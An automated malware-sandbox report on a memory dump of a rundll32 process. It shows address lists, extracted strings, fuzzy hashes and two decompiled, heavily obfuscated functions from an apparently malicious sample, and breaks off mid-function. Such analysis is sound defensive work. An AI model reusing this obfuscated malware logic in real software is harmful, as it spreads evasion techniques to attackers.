0x0024de85
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024dda4
0x0024ddd7
0x0024ddd8
0x0024ddfc
0x0024de01
0x0024de04
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024ddac
0x00000000
0x00000000
0x0024ddc8
0x0024ddcd
0x0024ddd0
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024dec2
0x0024dec8
0x0024dfa5
0x0024dfad
0x0024dfb2
0x00000000
0x0024dfb2
0x0024dece
0x0024ded4
0x0024df14
0x0024df21
0x0024df42
0x0024df5c
0x0024df68
0x0024df84
0x0024df89
0x0024df8c
0x0024dd75
0x0024dd75
0x0024dd77
0x00000000
0x0024dd77
0x0024dd75
0x0024ded6
0x0024dedc
0x00000000
0x00000000
0x0024defd
0x0024deff
0x0024df02
0x0024df04
0x00000000
0x00000000
0x0024df0a
0x00000000
0x0024dfb3
0x0024dfb3
0x0024dfb3
0x00000000
0x0024dfbf

Strings

Kx, xrefs: 0024DC24
H, xrefs: 0024D7F1
yql, xrefs: 0024D830
M% , xrefs: 0024D990
,, xrefs: 0024DAF9
@g, xrefs: 0024D84B
), xrefs: 0024D80A
m, xrefs: 0024DC4D
'], xrefs: 0024DC7E
"%j(, xrefs: 0024DC11
#0, xrefs: 0024D9A6
rj4, xrefs: 0024DCF1
Gm, xrefs: 0024D8BB
x&, xrefs: 0024DA4F
e/!, xrefs: 0024DE80
e/!, xrefs: 0024DDA6
6O, xrefs: 0024DA42

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "%j($#0$']$)$6O$@g$H$Kx$M% $e/!$e/!$x&$yql$,$Gm$m$rj4
API String ID: 0-131801274
Opcode ID: dd334fc3ca170f02087ade739037d5987a1292f86ff8bbcf52d28589b4646129
Instruction ID: c4243d17439b7af5764addd41e9e3298da31b37671755044be2b00b1539ff628
Opcode Fuzzy Hash: dd334fc3ca170f02087ade739037d5987a1292f86ff8bbcf52d28589b4646129
Instruction Fuzzy Hash: D6021271518380DFE369CF61C58AA5BBBE1FBC5708F10891DE2DA862A0D7B58958CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0024F98C, Relevance: 20.4, Strings: 16, Instructions: 390
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E0024F98C(intOrPtr* __edx, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v1;
				char _v96;
				char _v108;
				char _v112;
				char _v116;
				intOrPtr _v120;
				char _v124;
				char _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				intOrPtr _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				intOrPtr _v268;
				void* __ecx;
				void* _t344;
				void* _t374;
				signed int _t377;
				intOrPtr _t391;
				void* _t392;
				intOrPtr _t393;
				signed int _t395;
				intOrPtr _t396;
				signed int _t397;
				intOrPtr* _t401;
				intOrPtr _t403;
				intOrPtr* _t416;
				char* _t448;
				signed int _t450;
				signed int _t451;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t455;
				signed int _t456;
				signed int _t457;
				signed int _t458;
				signed int _t459;
				char* _t460;
				void* _t461;
				intOrPtr* _t468;
				void* _t470;
				void* _t472;

				_t401 = _a4;
				_push(_a16);
				_t468 = __edx;
				_push(_a12);
				_push(_a8);
				_push(_t401);
				_push(__edx);
				E0024602B(_t344);
				_v180 = 0x2a54;
				_t470 =  &_v268 + 0x18;
				_v180 = _v180 ^ 0xdbb28899;
				_t403 = 0;
				_t461 = 0x405be48;
				_v268 = 0;
				_t450 = 0x55;
				_v180 = _v180 * 0x34;
				_v180 = _v180 ^ 0xa04911e4;
				_v164 = 0x788;
				_v164 = _v164 * 0x79;
				_v164 = _v164 ^ 0x00038f4a;
				_v260 = 0xdd03;
				_v260 = _v260 ^ 0x82285f25;
				_v260 = _v260 >> 7;
				_v260 = _v260 << 4;
				_v260 = _v260 ^ 0x104552fc;
				_v132 = 0x81fa;
				_v132 = _v132 | 0x4b6553e1;
				_v132 = _v132 ^ 0x4b658f00;
				_v208 = 0xbd69;
				_t451 = 0x73;
				_v208 = _v208 / _t450;
				_v208 = _v208 + 0x56ba;
				_v208 = _v208 ^ 0x000029ec;
				_v156 = 0x625a;
				_v156 = _v156 + 0xffff65b2;
				_v156 = _v156 ^ 0xffffa807;
				_v176 = 0xc378;
				_v176 = _v176 >> 1;
				_v176 = _v176 + 0x1919;
				_v176 = _v176 ^ 0x00004408;
				_v228 = 0xbfad;
				_v228 = _v228 + 0xffff004b;
				_v228 = _v228 / _t451;
				_t452 = 0x16;
				_v228 = _v228 / _t452;
				_v228 = _v228 ^ 0x0019c242;
				_v264 = 0x218a;
				_v264 = _v264 | 0xaefe0d97;
				_v264 = _v264 + 0x77f0;
				_v264 = _v264 + 0xffffbecb;
				_v264 = _v264 ^ 0xaefe1c0e;
				_v152 = 0x1773;
				_v152 = _v152 + 0x7c73;
				_v152 = _v152 ^ 0x000090c4;
				_v140 = 0xfcb3;
				_v140 = _v140 + 0xffff1dd8;
				_v140 = _v140 ^ 0x00004a86;
				_v252 = 0x9e2f;
				_t453 = 9;
				_v252 = _v252 / _t453;
				_v252 = _v252 << 0xc;
				_v252 = _v252 + 0x6e7b;
				_v252 = _v252 ^ 0x01198ad6;
				_v136 = 0x978d;
				_v136 = _v136 << 0xb;
				_v136 = _v136 ^ 0x04bc6438;
				_v144 = 0xf0b5;
				_t454 = 0x79;
				_v144 = _v144 * 0x51;
				_v144 = _v144 ^ 0x004c2c51;
				_v224 = 0xa482;
				_v224 = _v224 ^ 0xc585cea3;
				_v224 = _v224 / _t454;
				_v224 = _v224 ^ 0x01a18743;
				_v148 = 0xd0a0;
				_v148 = _v148 >> 1;
				_v148 = _v148 ^ 0x000025e7;
				_v232 = 0xead1;
				_v232 = _v232 ^ 0xc3cfbc77;
				_v232 = _v232 | 0xf3c428cf;
				_v232 = _v232 + 0xffff938a;
				_v232 = _v232 ^ 0xf3cf35e7;
				_v160 = 0xb488;
				_v160 = _v160 + 0xf6e2;
				_v160 = _v160 ^ 0x0001c37e;
				_v212 = 0xc903;
				_t455 = 0x1e;
				_v212 = _v212 / _t455;
				_v212 = _v212 ^ 0xfd3886ab;
				_v212 = _v212 ^ 0xfd38fa88;
				_v196 = 0xdd05;
				_v196 = _v196 << 5;
				_v196 = _v196 + 0xdc4b;
				_v196 = _v196 ^ 0x001c7bd6;
				_v200 = 0x4db0;
				_v200 = _v200 ^ 0x1a7afaec;
				_v200 = _v200 >> 8;
				_v200 = _v200 ^ 0x001a5e83;
				_v240 = 0x9d3f;
				_v240 = _v240 >> 8;
				_v240 = _v240 << 9;
				_v240 = _v240 + 0x917a;
				_v240 = _v240 ^ 0x0001a611;
				_v256 = 0x4a86;
				_v256 = _v256 >> 0xd;
				_t456 = 0x55;
				_v256 = _v256 * 0x35;
				_v256 = _v256 + 0xffffab30;
				_v256 = _v256 ^ 0xffffb251;
				_v204 = 0x386;
				_v204 = _v204 / _t456;
				_v204 = _v204 ^ 0xc8309f8e;
				_v204 = _v204 ^ 0xc830cb09;
				_v172 = 0x8769;
				_v172 = _v172 >> 0xe;
				_v172 = _v172 ^ 0x00003b2d;
				_v244 = 0x2b5b;
				_v244 = _v244 + 0xb0ca;
				_v244 = _v244 + 0xd805;
				_v244 = _v244 << 2;
				_v244 = _v244 ^ 0x0006bd06;
				_v184 = 0x1527;
				_v184 = _v184 | 0xeeea078d;
				_t457 = 0x28;
				_v184 = _v184 / _t457;
				_v184 = _v184 ^ 0x05f92fca;
				_v192 = 0x11fc;
				_t458 = 0x16;
				_v192 = _v192 / _t458;
				_v192 = _v192 ^ 0x8895e54e;
				_v192 = _v192 ^ 0x8895ebcd;
				_v168 = 0xe011;
				_v168 = _v168 + 0x4c50;
				_v168 = _v168 ^ 0x0001058b;
				_v216 = 0xf07;
				_t459 = 0x32;
				_v216 = _v216 * 0x36;
				_v216 = _v216 >> 2;
				_v216 = _v216 ^ 0x00008949;
				_v248 = 0xde23;
				_v248 = _v248 + 0xecd9;
				_v248 = _v248 << 0xd;
				_v248 = _v248 ^ 0x1d8b17f5;
				_v248 = _v248 ^ 0x24d4a8d4;
				_v220 = 0x3854;
				_v220 = _v220 | 0x09b0f0f7;
				_v220 = _v220 + 0xe63e;
				_v220 = _v220 ^ 0x09b1b8f3;
				_v188 = 0x295e;
				_v188 = _v188 * 0x23;
				_v188 = _v188 / _t459;
				_v188 = _v188 ^ 0x00001cf4;
				_t460 = _v124;
				while(1) {
					L1:
					_t441 = _v236;
					while(1) {
						L2:
						_t472 = _t461 - 0x299f8b6c;
						if(_t472 <= 0) {
							break;
						}
						if(_t461 == 0x2e2d51e6) {
							_v124 = 0x14;
							_t374 = E0024F39F(_v244, _v128, _t460 + 0x60,  &_v124, _v184, _v192, _v164, _t403, _v168);
							_t403 = _v268;
							_t470 = _t470 + 0x1c;
							_t441 = _v236;
							if(_t374 == 0) {
								continue;
							}
							_t461 = 0x8f3e942;
							_t403 = 1;
							_v268 = 1;
							L29:
							if(_t461 == 0x33ec2607) {
								L33:
								return _v268;
							}
							while(1) {
								L1:
								_t441 = _v236;
								goto L2;
							}
						}
						if(_t461 == 0x2e332bc4) {
							E00252674(_v252, _v136, _a4, _t441, _v144, _v224,  *_t468);
							_t470 = _t470 + 0x14;
							_t461 = 0x2452d659;
							L9:
							_t403 = _v268;
							goto L1;
						}
						if(_t461 == 0x2efa85f7) {
							_t377 = _a4 + 1;
							if((_t377 & 0x0000000f) != 0) {
								_t377 = (_t377 & 0xfffffff0) + 0x10;
							}
							 *((intOrPtr*)(_t401 + 4)) = _t377 + 0x74;
							_push(_t403);
							_push(_t403);
							_t460 = E00248736( *((intOrPtr*)(_t401 + 4)));
							 *_t401 = _t460;
							if(_t460 == 0) {
								goto L33;
							} else {
								_t317 = _t460 + 0x74; // 0x74
								_t441 = _t317;
								_v116 = _a4;
								_t461 = 0x332cf2c2;
								_t403 = _v268;
								_v236 = _t317;
								_v120 =  *((intOrPtr*)(_t401 + 4)) - 0x74;
								continue;
							}
						}
						if(_t461 != 0x332cf2c2) {
							goto L29;
						}
						_t396 =  *0x25ca20; // 0x0
						_t397 = E00251B49( &_v128, _v264, _t403,  *((intOrPtr*)(_t396 + 0x2c)), _t403, _v152, _v140);
						_t470 = _t470 + 0x14;
						asm("sbb esi, esi");
						_t461 = ( ~_t397 & 0x0493a058) + 0x299f8b6c;
						goto L9;
					}
					if(_t472 == 0) {
						if(_t403 == 0) {
							E0024F536(_v156, _v176, _v228,  *_t401);
						}
						goto L33;
					}
					if(_t461 == 0x405be48) {
						_t461 = 0x2efa85f7;
						goto L2;
					}
					if(_t461 == 0x8f3e942) {
						_push(_t403);
						_push(_t403);
						E00245F43(_t403, _v128);
						_t461 = 0x299f8b6c;
						goto L9;
					}
					if(_t461 == 0x1e33600c) {
						_v112 = 0x6c;
						_t391 =  *0x25ca20; // 0x0
						_t392 = E00248010( &_v108,  &_v112, _v188, _v240,  *((intOrPtr*)(_t391 + 0x24)),  *((intOrPtr*)(_t391 + 0x10)), _v256, _v204, _v180, _v172);
						_t470 = _t470 + 0x20;
						if(_t392 == 0) {
							_t461 = 0x8f3e942;
							goto L9;
						}
						_t416 =  &_v1;
						_t448 = _t460;
						do {
							 *_t448 =  *_t416;
							_t448 = _t448 + 1;
							_t416 = _t416 - 1;
						} while (_t416 >=  &_v96);
						_t461 = 0x2e2d51e6;
						goto L9;
					}
					if(_t461 != 0x2452d659) {
						goto L29;
					}
					_t393 =  *0x25ca20; // 0x0
					_t395 = E00250A3B(_v120, _v128, _v148, _v232, _v160, _t403,  &_v116, _v212, _v196, _t441, _v200, _t403,  *((intOrPtr*)(_t393 + 0x10)));
					_t470 = _t470 + 0x2c;
					asm("sbb esi, esi");
					_t461 = ( ~_t395 & 0x153f76ca) + 0x8f3e942;
					goto L9;
				}
			}

0x0024f993
0x0024f99d
0x0024f9a4
0x0024f9a6
0x0024f9ad
0x0024f9b4
0x0024f9b5
0x0024f9b7
0x0024f9bc
0x0024f9c7
0x0024f9ca
0x0024f9d9
0x0024f9db
0x0024f9e0
0x0024f9e6
0x0024f9e9
0x0024f9ed
0x0024f9f5
0x0024fa02
0x0024fa06
0x0024fa0e
0x0024fa16
0x0024fa1e
0x0024fa23
0x0024fa28
0x0024fa30
0x0024fa3b
0x0024fa46
0x0024fa51
0x0024fa5f
0x0024fa60
0x0024fa66
0x0024fa6e
0x0024fa76
0x0024fa81
0x0024fa8c
0x0024fa97
0x0024fa9f
0x0024faa3
0x0024faab
0x0024fab3
0x0024fabb
0x0024facb
0x0024fad5
0x0024fada
0x0024fade
0x0024fae6
0x0024faee
0x0024faf6
0x0024fafe
0x0024fb06
0x0024fb0e
0x0024fb19
0x0024fb24
0x0024fb2f
0x0024fb3a
0x0024fb45
0x0024fb52
0x0024fb5e
0x0024fb63
0x0024fb69
0x0024fb6e
0x0024fb76
0x0024fb7e
0x0024fb89
0x0024fb91
0x0024fb9c
0x0024fbaf
0x0024fbb2
0x0024fbb9
0x0024fbc4
0x0024fbcc
0x0024fbdc
0x0024fbe0
0x0024fbe8
0x0024fbf3
0x0024fbfa
0x0024fc05
0x0024fc0d
0x0024fc15
0x0024fc1d
0x0024fc25
0x0024fc2d
0x0024fc38
0x0024fc43
0x0024fc4e
0x0024fc5a
0x0024fc5f
0x0024fc65
0x0024fc6d
0x0024fc75
0x0024fc7d
0x0024fc82
0x0024fc8a
0x0024fc92
0x0024fc9a
0x0024fca2
0x0024fca7
0x0024fcaf
0x0024fcb7
0x0024fcbc
0x0024fcc1
0x0024fcc9
0x0024fcd1
0x0024fcd9
0x0024fce3
0x0024fce4
0x0024fce8
0x0024fcf0
0x0024fcf8
0x0024fd06
0x0024fd0a
0x0024fd12
0x0024fd1a
0x0024fd22
0x0024fd27
0x0024fd2f
0x0024fd37
0x0024fd3f
0x0024fd47
0x0024fd4c
0x0024fd54
0x0024fd5c
0x0024fd6c
0x0024fd71
0x0024fd77
0x0024fd7f
0x0024fd8b
0x0024fd90
0x0024fd96
0x0024fd9e
0x0024fda6
0x0024fdae
0x0024fdb6
0x0024fdbe
0x0024fdcb
0x0024fdcc
0x0024fdd0
0x0024fdd5
0x0024fddd
0x0024fde5
0x0024fded
0x0024fdf2
0x0024fdfa
0x0024fe02
0x0024fe0a
0x0024fe12
0x0024fe1a
0x0024fe22
0x0024fe2f
0x0024fe39
0x0024fe3d
0x0024fe45
0x0024fe4c
0x0024fe4c
0x0024fe4c
0x0024fe50
0x0024fe50
0x0024fe50
0x0024fe56
0x00000000
0x00000000
0x0024ff96
0x0025009f
0x002500ca
0x002500cf
0x002500d3
0x002500d6
0x002500dc
0x00000000
0x00000000
0x002500e4
0x002500e9
0x002500ea
0x002500ee
0x002500f4
0x00250117
0x00250125
0x00250125
0x0024fe4c
0x0024fe4c
0x0024fe4c
0x00000000
0x0024fe4c
0x0024fe4c
0x0024ffa2
0x00250082
0x00250087
0x0025008a
0x0024fee7
0x0024fee7
0x00000000
0x0024fee7
0x0024ffae
0x00250001
0x00250004
0x00250009
0x00250009
0x0025000f
0x00250021
0x00250022
0x0025002b
0x0025002d
0x00250033
0x00000000
0x00250039
0x0025003c
0x0025003c
0x00250045
0x0025004c
0x00250051
0x00250055
0x00250059
0x00000000
0x00250059
0x00250033
0x0024ffb6
0x00000000
0x00000000
0x0024ffca
0x0024ffdf
0x0024ffe4
0x0024ffeb
0x0024fff3
0x00000000
0x0024fff3
0x0024fe5c
0x002500fd
0x00250110
0x00250116
0x00000000
0x002500fd
0x0024fe68
0x0024ff86
0x00000000
0x0024ff86
0x0024fe74
0x0024ff73
0x0024ff74
0x0024ff75
0x0024ff7c
0x00000000
0x0024ff7c
0x0024fe80
0x0024fef4
0x0024ff19
0x0024ff2c
0x0024ff31
0x0024ff36
0x0024ff59
0x00000000
0x0024ff59
0x0024ff38
0x0024ff3f
0x0024ff41
0x0024ff43
0x0024ff45
0x0024ff46
0x0024ff4e
0x0024ff52
0x00000000
0x0024ff52
0x0024fe88
0x00000000
0x00000000
0x0024fe8e
0x0024fecd
0x0024fed2
0x0024fed9
0x0024fee1
0x00000000
0x0024fee1

Strings

[+, xrefs: 0024FD2F
>, xrefs: 0024FE12
%, xrefs: 0024FBFA
l, xrefs: 0024FEF4
-;, xrefs: 0024FD27
PL, xrefs: 0024FDAE
SeK, xrefs: 0024FA3B
Q-., xrefs: 0024FF90
), xrefs: 0024FA6E
Zb, xrefs: 0024FA76
K, xrefs: 0024FABB
s|, xrefs: 0024FB19
Q,L, xrefs: 0024FBB9
^), xrefs: 0024FE22
{n, xrefs: 0024FB6E
Q-., xrefs: 0024FF52

Memory Dump Source

Source File: 00000007.00000002.2104303323.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2104292967.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2104345430.000000000025C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_240000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: -;$>$K$PL$Q,L$Zb$[+$^)$l$s|${n$%$)$Q-.$Q-.$SeK
API String ID: 0-11970308
Opcode ID: fd9420bb2fc36f2248fbf5f6c6d8adf484dcf1456411f097187bca4ab3d98c4a
Instruction ID: cfc609525313bec8f1e4f2a11f3488f0f75be7d90685bd6ab95f0f204ede9f34
Opcode Fuzzy Hash: fd9420bb2fc36f2248fbf5f6c6d8adf484dcf1456411f097187bca4ab3d98c4a
Instruction Fuzzy Hash: 131245725183808FE368CF25C989A4FBBF1BBC4314F148A1DF6D9862A0D7B59959CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00241CFA, Relevance: 19.3, Strings: 15, Instructions: 503
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E00241CFA(void* __edx, intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				unsigned int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				unsigned int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				void* __ecx;
				void* _t496;
				void* _t539;
				intOrPtr _t544;
				intOrPtr _t546;
				signed int _t548;
				signed int _t551;
				intOrPtr _t552;
				intOrPtr _t554;
				signed int _t555;
				intOrPtr _t562;
				intOrPtr _t572;
				void* _t574;
				signed int _t577;
				signed int _t578;
				signed int _t579;
				signed int _t580;
				signed int _t581;
				signed int _t582;
				signed int _t583;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t587;
				signed int _t588;
				signed int _t589;
				signed int _t590;
				intOrPtr _t591;
				intOrPtr _t592;
				void* _t597;
				intOrPtr _t599;
				intOrPtr _t635;
				intOrPtr _t639;
				void* _t641;
				signed int* _t653;
				void* _t656;

				_t575 = _a4;
				_push(_a4);
				_push(__edx);
				E0024602B(_t496);
				_v12 = 0x36bdff;
				_t653 =  &(( &_v228)[3]);
				_v8 = 0x3ff2a1;
				_t639 = 0;
				_v4 = 0;
				_v132 = 0xebdb;
				_t641 = 0x15e50797;
				_t577 = 0x54;
				_v132 = _v132 / _t577;
				_v132 = _v132 | 0x22f60655;
				_v132 = _v132 ^ 0x22f660d1;
				_v120 = 0xef02;
				_v120 = _v120 + 0xffff4354;
				_v120 = _v120 + 0xfbd6;
				_v120 = _v120 ^ 0x0001ae28;
				_v52 = 0x7417;
				_v52 = _v52 + 0x1179;
				_v52 = _v52 ^ 0x00000590;
				_v48 = 0x8f30;
				_v48 = _v48 >> 0xf;
				_v64 = 0xc7cd;
				_v64 = _v64 << 0xc;
				_v64 = _v64 ^ 0x0c7cd040;
				_v140 = 0xc967;
				_v140 = _v140 << 0xb;
				_v140 = _v140 | 0xe06bf9c9;
				_v140 = _v140 ^ 0x166bf9c9;
				_v196 = 0x461e;
				_v196 = _v196 | 0x6b692bd6;
				_v196 = _v196 + 0xc0cf;
				_v196 = _v196 + 0xffff0de4;
				_v196 = _v196 ^ 0x6b6977c5;
				_v180 = 0xfff7;
				_t578 = 0x59;
				_v180 = _v180 / _t578;
				_t579 = 0x4d;
				_v180 = _v180 * 0x18;
				_v180 = _v180 | 0x58a6a9da;
				_v180 = _v180 ^ 0x58a6c249;
				_v128 = 0x9f16;
				_v128 = _v128 ^ 0xdade8ffa;
				_v128 = _v128 ^ 0x4c90ffe3;
				_v128 = _v128 ^ 0x964ece00;
				_v92 = 0xcecd;
				_v92 = _v92 + 0x8237;
				_v92 = _v92 / _t579;
				_v92 = _v92 ^ 0x00006f99;
				_v100 = 0x1088;
				_v100 = _v100 << 8;
				_v100 = _v100 << 3;
				_v100 = _v100 ^ 0x0084674e;
				_v108 = 0x5533;
				_v108 = _v108 >> 9;
				_v108 = _v108 | 0xd8fb4233;
				_v108 = _v108 ^ 0xd8fb1bcd;
				_v208 = 0xcae;
				_v208 = _v208 / _t579;
				_t580 = 0x13;
				_v208 = _v208 / _t580;
				_v208 = _v208 >> 0xa;
				_v208 = _v208 ^ 0x00001a16;
				_v216 = 0x40e3;
				_v216 = _v216 | 0x810267c5;
				_v216 = _v216 << 1;
				_v216 = _v216 << 3;
				_v216 = _v216 ^ 0x10267eee;
				_v28 = 0xb673;
				_t581 = 0x3e;
				_v28 = _v28 / _t581;
				_v28 = _v28 ^ 0x0000683f;
				_v40 = 0x9279;
				_v40 = _v40 + 0xffffeab6;
				_v40 = _v40 ^ 0x000054a5;
				_v204 = 0x1c40;
				_v204 = _v204 + 0xffff1f7d;
				_t582 = 0x50;
				_v204 = _v204 / _t582;
				_v204 = _v204 ^ 0x72bb6b9a;
				_v204 = _v204 ^ 0x71887e03;
				_v112 = 0xb897;
				_v112 = _v112 + 0xffffdcba;
				_v112 = _v112 | 0x14aad9bd;
				_v112 = _v112 ^ 0x14aaad8a;
				_v172 = 0xd85f;
				_v172 = _v172 + 0xffff9181;
				_t583 = 0x36;
				_v172 = _v172 * 0x2e;
				_v172 = _v172 + 0x3c74;
				_v172 = _v172 ^ 0x00135ecd;
				_v212 = 0x19f7;
				_v212 = _v212 + 0xffff95e1;
				_v212 = _v212 | 0x04fc32b0;
				_v212 = _v212 << 0xa;
				_v212 = _v212 ^ 0xfeffe01a;
				_v36 = 0x7d37;
				_v36 = _v36 | 0x20ef5b1a;
				_v36 = _v36 ^ 0x20ef0402;
				_v116 = 0xd595;
				_v116 = _v116 / _t583;
				_v116 = _v116 + 0xffffe49c;
				_v116 = _v116 ^ 0xffffa94a;
				_v160 = 0x5e14;
				_v160 = _v160 | 0xdf0c29a2;
				_v160 = _v160 ^ 0xe579e09e;
				_v160 = _v160 + 0xffffde5a;
				_v160 = _v160 ^ 0x3a753154;
				_v68 = 0x52ff;
				_v68 = _v68 >> 8;
				_v68 = _v68 ^ 0x000014f4;
				_v76 = 0x7879;
				_t584 = 0x73;
				_v76 = _v76 / _t584;
				_v76 = _v76 ^ 0x0000054d;
				_v72 = 0x594e;
				_v72 = _v72 ^ 0x61e5003d;
				_v72 = _v72 ^ 0x61e57443;
				_v156 = 0xdc41;
				_v156 = _v156 << 6;
				_v156 = _v156 << 0x10;
				_v156 = _v156 ^ 0x10402e5f;
				_v152 = 0x2cab;
				_v152 = _v152 << 0xc;
				_v152 = _v152 ^ 0xa6d63634;
				_v152 = _v152 ^ 0xa41cdbd3;
				_v24 = 0xfca2;
				_v24 = _v24 >> 0xd;
				_v24 = _v24 ^ 0x000010c7;
				_v96 = 0xe6c1;
				_v96 = _v96 << 0xd;
				_v96 = _v96 + 0xc19f;
				_v96 = _v96 ^ 0x1cd8953a;
				_v224 = 0x49a1;
				_v224 = _v224 ^ 0xfe0521c0;
				_v224 = _v224 + 0x1e0d;
				_v224 = _v224 | 0x46707e16;
				_v224 = _v224 ^ 0xfe759897;
				_v228 = 0x2882;
				_v228 = _v228 << 0x10;
				_v228 = _v228 ^ 0x2e28bbbf;
				_v228 = _v228 | 0x3bec92e5;
				_v228 = _v228 ^ 0x3fee891d;
				_v136 = 0x5ad;
				_v136 = _v136 ^ 0x3d33a635;
				_v136 = _v136 + 0xffff9ac4;
				_v136 = _v136 ^ 0x3d335448;
				_v104 = 0x3c69;
				_v104 = _v104 + 0xf144;
				_t585 = 0x19;
				_v104 = _v104 * 0x1e;
				_v104 = _v104 ^ 0x0023546a;
				_v188 = 0xf300;
				_v188 = _v188 / _t585;
				_v188 = _v188 + 0xffffad26;
				_v188 = _v188 | 0x8105dcb8;
				_v188 = _v188 ^ 0xffffe238;
				_v144 = 0x45c8;
				_v144 = _v144 >> 0xe;
				_v144 = _v144 + 0x45b6;
				_v144 = _v144 ^ 0x000072cd;
				_v192 = 0xd236;
				_v192 = _v192 >> 0x10;
				_t586 = 0x69;
				_v192 = _v192 / _t586;
				_v192 = _v192 ^ 0x176600d6;
				_v192 = _v192 ^ 0x17663ad7;
				_v200 = 0x1b90;
				_v200 = _v200 >> 0xe;
				_v200 = _v200 | 0x00032953;
				_t587 = 0xe;
				_v200 = _v200 * 0x71;
				_v200 = _v200 ^ 0x016540c6;
				_v32 = 0xa5b;
				_v32 = _v32 / _t587;
				_v32 = _v32 ^ 0x00002bda;
				_v56 = 0xbe4e;
				_v56 = _v56 + 0xffffe059;
				_v56 = _v56 ^ 0x0000eaa3;
				_v220 = 0x4321;
				_v220 = _v220 ^ 0x3fa1daa1;
				_v220 = _v220 + 0xffff309f;
				_t588 = 0x24;
				_v220 = _v220 / _t588;
				_v220 = _v220 ^ 0x01c46047;
				_v164 = 0x3944;
				_v164 = _v164 + 0xffff1fd9;
				_t589 = 0x2b;
				_v164 = _v164 * 0x57;
				_v164 = _v164 << 4;
				_v164 = _v164 ^ 0xfc749d64;
				_v148 = 0x7755;
				_v148 = _v148 ^ 0x244775ea;
				_v148 = _v148 | 0xcd3e82a6;
				_v148 = _v148 ^ 0xed7f8152;
				_v88 = 0x40ad;
				_v88 = _v88 >> 0xf;
				_v88 = _v88 ^ 0x000030bd;
				_v80 = 0x9327;
				_v80 = _v80 * 0x70;
				_v80 = _v80 ^ 0x00406c8d;
				_v176 = 0x8ba8;
				_v176 = _v176 + 0x5748;
				_v176 = _v176 + 0xffffe08a;
				_v176 = _v176 + 0xffffcf91;
				_v176 = _v176 ^ 0x0000bf1e;
				_v124 = 0xe985;
				_v124 = _v124 ^ 0x9cf6d459;
				_v124 = _v124 + 0xffffb832;
				_v124 = _v124 ^ 0x9cf5d440;
				_v184 = 0xee13;
				_v184 = _v184 / _t589;
				_v184 = _v184 ^ 0x973ecc13;
				_t590 = 0x6a;
				_v184 = _v184 / _t590;
				_v184 = _v184 ^ 0x016d24ef;
				_v84 = 0xbcf1;
				_v84 = _v84 ^ 0x64b03ea8;
				_v84 = _v84 ^ 0x64b0e2a8;
				_v60 = 0x8a4f;
				_v60 = _v60 | 0x8c15d5a4;
				_v60 = _v60 ^ 0x8c14dfef;
				_v44 = 0x30ef;
				_v44 = _v44 + 0xffffe2a4;
				_v44 = _v44 ^ 0x00001380;
				_v168 = 0xbe5e;
				_v168 = _v168 << 0x10;
				_v168 = _v168 | 0x5aa68a8d;
				_v168 = _v168 + 0xffff34cf;
				_v168 = _v168 ^ 0xfefdbf5d;
				goto L1;
				do {
					while(1) {
						L1:
						_t656 = _t641 - 0x2e2ba50c;
						if(_t656 > 0) {
							break;
						}
						if(_t656 == 0) {
							_push(_t590);
							_push(_t590);
							_t591 =  *0x25ca20; // 0x0
							_t590 = _t591 + 0x18;
							_t551 = E0024C46E(_t590, _v208, _v216, _v28, _v140 | _v64, _t590, _v40);
							_t653 =  &(_t653[7]);
							asm("sbb esi, esi");
							_t641 = ( ~_t551 & 0xf61d5154) + 0x3b32afa9;
							continue;
						} else {
							if(_t641 == 0xfdb1f24) {
								_t552 =  *0x25ca20; // 0x0
								_t554 =  *0x25ca20; // 0x0
								_t555 = E0024F292(_v72, _v156,  *((intOrPtr*)(_t554 + 0x18)), _v152, _v20, _v24, _t590, _v16, _t552 + 0x24, _t590, _v96);
